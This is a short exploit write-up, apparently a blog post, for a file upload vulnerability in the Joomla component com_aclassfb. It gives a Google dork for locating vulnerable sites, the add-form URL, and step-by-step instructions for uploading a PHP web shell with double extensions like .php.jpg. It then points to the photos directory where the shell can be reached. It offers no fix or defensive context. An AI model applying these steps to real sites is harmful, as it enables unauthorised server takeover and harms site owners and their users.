Title : Joomla com_aclassfb File Upload Vulnerability
Category : Web Applications
Type : PHP
Tested : Mozila, Chrome, Opera -> Windows & Linux
Vulnerabillity : File Upload
Dork : inurl:com_aclassfb
File Upload
http://127.0.0.1/index.php?option=com_aclassfb
Exploit
http://127.0.0.1/index.php?option=com_aclassfb&Itemid=[ID]&ct=[CATEGORY]&md=add_form
POC
1. Select Category
2. After Select Category, Click “Post New Ad”
http://127.0.0.1/index.php?option=com_aclassfb&Itemid=[ID]&ct=[CATEGORY]&md=add_form
3. Upload Your Shell
extension : .php .php.jpg / etc
Shell Access :
http://127.0.0.1/component/com_aclassfb/photos/
Find Your Shell
No comments:
Post a Comment